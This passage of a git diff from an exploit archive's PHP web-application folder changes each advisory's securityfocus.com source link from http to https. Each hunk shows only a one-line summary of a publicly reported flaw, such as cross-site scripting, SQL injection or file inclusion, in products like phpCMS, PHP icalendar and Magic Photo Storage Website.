scripting issue, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29270.txt b/exploits/php/webapps/29270.txt index 03737b358..a93186cfb 100644 --- a/exploits/php/webapps/29270.txt +++ b/exploits/php/webapps/29270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21520/info +source: https://www.securityfocus.com/bid/21520/info The mxBB profile Control Panel module is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29272.txt b/exploits/php/webapps/29272.txt index 82cc8b26f..29bcd989d 100644 --- a/exploits/php/webapps/29272.txt +++ b/exploits/php/webapps/29272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21527/info +source: https://www.securityfocus.com/bid/21527/info CMS Made Simple is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29278.pl b/exploits/php/webapps/29278.pl index d1a436004..fc8e8fd94 100755 --- a/exploits/php/webapps/29278.pl +++ b/exploits/php/webapps/29278.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21580/info +source: https://www.securityfocus.com/bid/21580/info WORK system e-commerce is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29282.txt b/exploits/php/webapps/29282.txt index 57591b738..3d93076f2 100644 --- a/exploits/php/webapps/29282.txt +++ b/exploits/php/webapps/29282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21595/info +source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure vulnerabilities, an arbitrary file-upload vulnerability, and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29283.txt b/exploits/php/webapps/29283.txt index 69cfb15b9..2f67bffd4 100644 --- a/exploits/php/webapps/29283.txt +++ b/exploits/php/webapps/29283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21595/info +source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure vulnerabilities, an arbitrary file-upload vulnerability, and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29284.txt b/exploits/php/webapps/29284.txt index 6cb23cd9b..9710dedb3 100644 --- a/exploits/php/webapps/29284.txt +++ b/exploits/php/webapps/29284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21596/info +source: https://www.securityfocus.com/bid/21596/info Moodle is reported prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and an HTML injection issue, because the application fails to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/29289.php b/exploits/php/webapps/29289.php index f8b19f1bf..025ed521b 100644 --- a/exploits/php/webapps/29289.php +++ b/exploits/php/webapps/29289.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21621/info +source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29294.html b/exploits/php/webapps/29294.html index 8fe2eeea8..9bdb831c4 100644 --- a/exploits/php/webapps/29294.html +++ b/exploits/php/webapps/29294.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21637/info +source: https://www.securityfocus.com/bid/21637/info Knusperleicht Shoutbox is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29298.txt b/exploits/php/webapps/29298.txt index 1617a81c5..324817321 100644 --- a/exploits/php/webapps/29298.txt +++ b/exploits/php/webapps/29298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21669/info +source: https://www.securityfocus.com/bid/21669/info osTicket Support Cards is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29299.txt b/exploits/php/webapps/29299.txt index fcc8e9306..14569eeae 100644 --- a/exploits/php/webapps/29299.txt +++ b/exploits/php/webapps/29299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21677/info +source: https://www.securityfocus.com/bid/21677/info Mini Web Shop is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29300.txt b/exploits/php/webapps/29300.txt index 50f185087..ecef90a8d 100644 --- a/exploits/php/webapps/29300.txt +++ b/exploits/php/webapps/29300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21680/info +source: https://www.securityfocus.com/bid/21680/info TYPO3 is prone to multiple vulnerabilities that allow attackers to execute arbitrary commands. This issue occurs because the application fails to properly sanitize user-supplied data. diff --git a/exploits/php/webapps/29303.txt b/exploits/php/webapps/29303.txt index a289c1581..a410b357d 100644 --- a/exploits/php/webapps/29303.txt +++ b/exploits/php/webapps/29303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21703/info +source: https://www.securityfocus.com/bid/21703/info PHPBuilder is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29304.txt b/exploits/php/webapps/29304.txt index 11052c268..727cd9ae8 100644 --- a/exploits/php/webapps/29304.txt +++ b/exploits/php/webapps/29304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21708/info +source: https://www.securityfocus.com/bid/21708/info Calacode @Mail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29306.txt b/exploits/php/webapps/29306.txt index fa42b8e72..6795d32c7 100644 --- a/exploits/php/webapps/29306.txt +++ b/exploits/php/webapps/29306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21716/info +source: https://www.securityfocus.com/bid/21716/info The 'a-blog' application is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29308.txt b/exploits/php/webapps/29308.txt index 52691d5b1..88a15e7a6 100644 --- a/exploits/php/webapps/29308.txt +++ b/exploits/php/webapps/29308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21717/info +source: https://www.securityfocus.com/bid/21717/info Oracle Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before returning it to the user. diff --git a/exploits/php/webapps/29311.txt b/exploits/php/webapps/29311.txt index cf448e40f..02cc0383c 100644 --- a/exploits/php/webapps/29311.txt +++ b/exploits/php/webapps/29311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21719/info +source: https://www.securityfocus.com/bid/21719/info Xt-News is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29313.txt b/exploits/php/webapps/29313.txt index 00bad9494..12e62d30b 100644 --- a/exploits/php/webapps/29313.txt +++ b/exploits/php/webapps/29313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21719/info +source: https://www.securityfocus.com/bid/21719/info Xt-News is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29314.txt b/exploits/php/webapps/29314.txt index cc7f38e82..0a65e667c 100644 --- a/exploits/php/webapps/29314.txt +++ b/exploits/php/webapps/29314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21719/info +source: https://www.securityfocus.com/bid/21719/info Xt-News is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29337.txt b/exploits/php/webapps/29337.txt index b1f8168d5..df1601e2c 100644 --- a/exploits/php/webapps/29337.txt +++ b/exploits/php/webapps/29337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21733/info +source: https://www.securityfocus.com/bid/21733/info TimberWolf is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29338.txt b/exploits/php/webapps/29338.txt index 5e4b62447..cb65916aa 100644 --- a/exploits/php/webapps/29338.txt +++ b/exploits/php/webapps/29338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21736/info +source: https://www.securityfocus.com/bid/21736/info vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application. diff --git a/exploits/php/webapps/29342.txt b/exploits/php/webapps/29342.txt index e8339596a..35b61d4c9 100644 --- a/exploits/php/webapps/29342.txt +++ b/exploits/php/webapps/29342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21765/info +source: https://www.securityfocus.com/bid/21765/info Multiple remote file-include vulnerabilities affect Luckybot because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. diff --git a/exploits/php/webapps/29343.txt b/exploits/php/webapps/29343.txt index 0aec723f3..13672ab0e 100644 --- a/exploits/php/webapps/29343.txt +++ b/exploits/php/webapps/29343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29344.txt b/exploits/php/webapps/29344.txt index 75f6e3e1e..bec0473ac 100644 --- a/exploits/php/webapps/29344.txt +++ b/exploits/php/webapps/29344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29345.txt b/exploits/php/webapps/29345.txt index e676ef35e..023eab952 100644 --- a/exploits/php/webapps/29345.txt +++ b/exploits/php/webapps/29345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29346.txt b/exploits/php/webapps/29346.txt index adb88e4a9..a4c4478ea 100644 --- a/exploits/php/webapps/29346.txt +++ b/exploits/php/webapps/29346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29347.txt b/exploits/php/webapps/29347.txt index 212cd73c9..02d64b70c 100644 --- a/exploits/php/webapps/29347.txt +++ b/exploits/php/webapps/29347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29348.txt b/exploits/php/webapps/29348.txt index d7cfddb45..dc9af7a15 100644 --- a/exploits/php/webapps/29348.txt +++ b/exploits/php/webapps/29348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29349.txt b/exploits/php/webapps/29349.txt index a316cebca..05b316066 100644 --- a/exploits/php/webapps/29349.txt +++ b/exploits/php/webapps/29349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29350.txt b/exploits/php/webapps/29350.txt index 3829cd8ba..4fcbbd9bb 100644 --- a/exploits/php/webapps/29350.txt +++ b/exploits/php/webapps/29350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29351.txt b/exploits/php/webapps/29351.txt index 152a09493..c8a8ca826 100644 --- a/exploits/php/webapps/29351.txt +++ b/exploits/php/webapps/29351.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29352.txt b/exploits/php/webapps/29352.txt index 607d0e919..0c854e7ce 100644 --- a/exploits/php/webapps/29352.txt +++ b/exploits/php/webapps/29352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29356.txt b/exploits/php/webapps/29356.txt index 7f6c34cbb..33ed78499 100644 --- a/exploits/php/webapps/29356.txt +++ b/exploits/php/webapps/29356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21782/info +source: https://www.securityfocus.com/bid/21782/info Wordpress is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29363.txt b/exploits/php/webapps/29363.txt index 10b8c89c7..4a4879d09 100644 --- a/exploits/php/webapps/29363.txt +++ b/exploits/php/webapps/29363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29364.txt b/exploits/php/webapps/29364.txt index 2f97fe50a..e51ee39bb 100644 --- a/exploits/php/webapps/29364.txt +++ b/exploits/php/webapps/29364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29365.txt b/exploits/php/webapps/29365.txt index bac53bb51..3cef06780 100644 --- a/exploits/php/webapps/29365.txt +++ b/exploits/php/webapps/29365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29366.txt b/exploits/php/webapps/29366.txt index 0b23e028d..05c68f096 100644 --- a/exploits/php/webapps/29366.txt +++ b/exploits/php/webapps/29366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29367.txt b/exploits/php/webapps/29367.txt index a2ad41055..a227b0eb1 100644 --- a/exploits/php/webapps/29367.txt +++ b/exploits/php/webapps/29367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29368.txt b/exploits/php/webapps/29368.txt index 2d6f97a5f..9905bd6ae 100644 --- a/exploits/php/webapps/29368.txt +++ b/exploits/php/webapps/29368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29369.txt b/exploits/php/webapps/29369.txt index 1cbac9e14..e50231f41 100644 --- a/exploits/php/webapps/29369.txt +++ b/exploits/php/webapps/29369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29370.txt b/exploits/php/webapps/29370.txt index 7250ffbdb..9508204f2 100644 --- a/exploits/php/webapps/29370.txt +++ b/exploits/php/webapps/29370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29372.txt b/exploits/php/webapps/29372.txt index 25c6b9e7b..fbe351276 100644 --- a/exploits/php/webapps/29372.txt +++ b/exploits/php/webapps/29372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21817/info +source: https://www.securityfocus.com/bid/21817/info Mobilelib GOLD is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29375.txt b/exploits/php/webapps/29375.txt index 10d11eed3..0f206a8e7 100644 --- a/exploits/php/webapps/29375.txt +++ b/exploits/php/webapps/29375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21843/info +source: https://www.securityfocus.com/bid/21843/info Simplog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29376.txt b/exploits/php/webapps/29376.txt index ca2cd9777..b4030c09f 100644 --- a/exploits/php/webapps/29376.txt +++ b/exploits/php/webapps/29376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21844/info +source: https://www.securityfocus.com/bid/21844/info vCard PRO is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29377.txt b/exploits/php/webapps/29377.txt index 2857037bc..b66465b22 100644 --- a/exploits/php/webapps/29377.txt +++ b/exploits/php/webapps/29377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29378.txt b/exploits/php/webapps/29378.txt index 6557cc1f8..cff1f6d75 100644 --- a/exploits/php/webapps/29378.txt +++ b/exploits/php/webapps/29378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29379.txt b/exploits/php/webapps/29379.txt index 2c6a9eba1..7b8ff72d4 100644 --- a/exploits/php/webapps/29379.txt +++ b/exploits/php/webapps/29379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29380.txt b/exploits/php/webapps/29380.txt index fb4da601e..cb649a156 100644 --- a/exploits/php/webapps/29380.txt +++ b/exploits/php/webapps/29380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29381.txt b/exploits/php/webapps/29381.txt index e9a5eb862..29c9d5701 100644 --- a/exploits/php/webapps/29381.txt +++ b/exploits/php/webapps/29381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29382.txt b/exploits/php/webapps/29382.txt index 4a39c3d07..4520f19bc 100644 --- a/exploits/php/webapps/29382.txt +++ b/exploits/php/webapps/29382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21845/info +source: https://www.securityfocus.com/bid/21845/info AShop Deluxe and AShop Administration Panel are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29384.txt b/exploits/php/webapps/29384.txt index 8d97128b0..de6a0645a 100644 --- a/exploits/php/webapps/29384.txt +++ b/exploits/php/webapps/29384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21880/info +source: https://www.securityfocus.com/bid/21880/info RI Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29397.php b/exploits/php/webapps/29397.php index 13094ddae..c27858d08 100644 --- a/exploits/php/webapps/29397.php +++ b/exploits/php/webapps/29397.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21894/info +source: https://www.securityfocus.com/bid/21894/info Coppermine Photo Gallery is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29404.txt b/exploits/php/webapps/29404.txt index 11899d945..f0639e7d4 100644 --- a/exploits/php/webapps/29404.txt +++ b/exploits/php/webapps/29404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21956/info +source: https://www.securityfocus.com/bid/21956/info MediaWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29405.txt b/exploits/php/webapps/29405.txt index b985c972c..89d31434d 100644 --- a/exploits/php/webapps/29405.txt +++ b/exploits/php/webapps/29405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21962/info +source: https://www.securityfocus.com/bid/21962/info PHPKIT is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29407.txt b/exploits/php/webapps/29407.txt index 90396b1f4..8b7d8bbd5 100644 --- a/exploits/php/webapps/29407.txt +++ b/exploits/php/webapps/29407.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29408.txt b/exploits/php/webapps/29408.txt index 1e15ac167..0b3307346 100644 --- a/exploits/php/webapps/29408.txt +++ b/exploits/php/webapps/29408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29409.txt b/exploits/php/webapps/29409.txt index 260853cb2..76b9722f6 100644 --- a/exploits/php/webapps/29409.txt +++ b/exploits/php/webapps/29409.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29410.txt b/exploits/php/webapps/29410.txt index 3e91bb5d4..64ac50ba0 100644 --- a/exploits/php/webapps/29410.txt +++ b/exploits/php/webapps/29410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29411.txt b/exploits/php/webapps/29411.txt index 3dee50432..b46376bcb 100644 --- a/exploits/php/webapps/29411.txt +++ b/exploits/php/webapps/29411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29412.txt b/exploits/php/webapps/29412.txt index 0a711ac3b..03c8fb697 100644 --- a/exploits/php/webapps/29412.txt +++ b/exploits/php/webapps/29412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29413.txt b/exploits/php/webapps/29413.txt index 5eec9b639..2af62aba0 100644 --- a/exploits/php/webapps/29413.txt +++ b/exploits/php/webapps/29413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29414.txt b/exploits/php/webapps/29414.txt index 61674781c..da5a5a336 100644 --- a/exploits/php/webapps/29414.txt +++ b/exploits/php/webapps/29414.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29415.txt b/exploits/php/webapps/29415.txt index a518f9d8c..6b2a25b66 100644 --- a/exploits/php/webapps/29415.txt +++ b/exploits/php/webapps/29415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29416.txt b/exploits/php/webapps/29416.txt index 176ff008a..99f89e639 100644 --- a/exploits/php/webapps/29416.txt +++ b/exploits/php/webapps/29416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29417.txt b/exploits/php/webapps/29417.txt index a66f769d9..d056391be 100644 --- a/exploits/php/webapps/29417.txt +++ b/exploits/php/webapps/29417.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29418.txt b/exploits/php/webapps/29418.txt index 8e8e70b57..b21b48e24 100644 --- a/exploits/php/webapps/29418.txt +++ b/exploits/php/webapps/29418.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29419.txt b/exploits/php/webapps/29419.txt index dc380898c..2d53c0c53 100644 --- a/exploits/php/webapps/29419.txt +++ b/exploits/php/webapps/29419.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29420.txt b/exploits/php/webapps/29420.txt index 2155d07ab..d3c4f0115 100644 --- a/exploits/php/webapps/29420.txt +++ b/exploits/php/webapps/29420.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29421.txt b/exploits/php/webapps/29421.txt index 7a5d8fffb..333490888 100644 --- a/exploits/php/webapps/29421.txt +++ b/exploits/php/webapps/29421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29422.txt b/exploits/php/webapps/29422.txt index 7f8001946..b987a17b9 100644 --- a/exploits/php/webapps/29422.txt +++ b/exploits/php/webapps/29422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29423.txt b/exploits/php/webapps/29423.txt index b7e1a7954..a8115eb57 100644 --- a/exploits/php/webapps/29423.txt +++ b/exploits/php/webapps/29423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29424.txt b/exploits/php/webapps/29424.txt index c5dc28ac0..2f81bc31b 100644 --- a/exploits/php/webapps/29424.txt +++ b/exploits/php/webapps/29424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29425.txt b/exploits/php/webapps/29425.txt index cb84677b9..aa4b406d0 100644 --- a/exploits/php/webapps/29425.txt +++ b/exploits/php/webapps/29425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29426.txt b/exploits/php/webapps/29426.txt index 22af70424..51f21a284 100644 --- 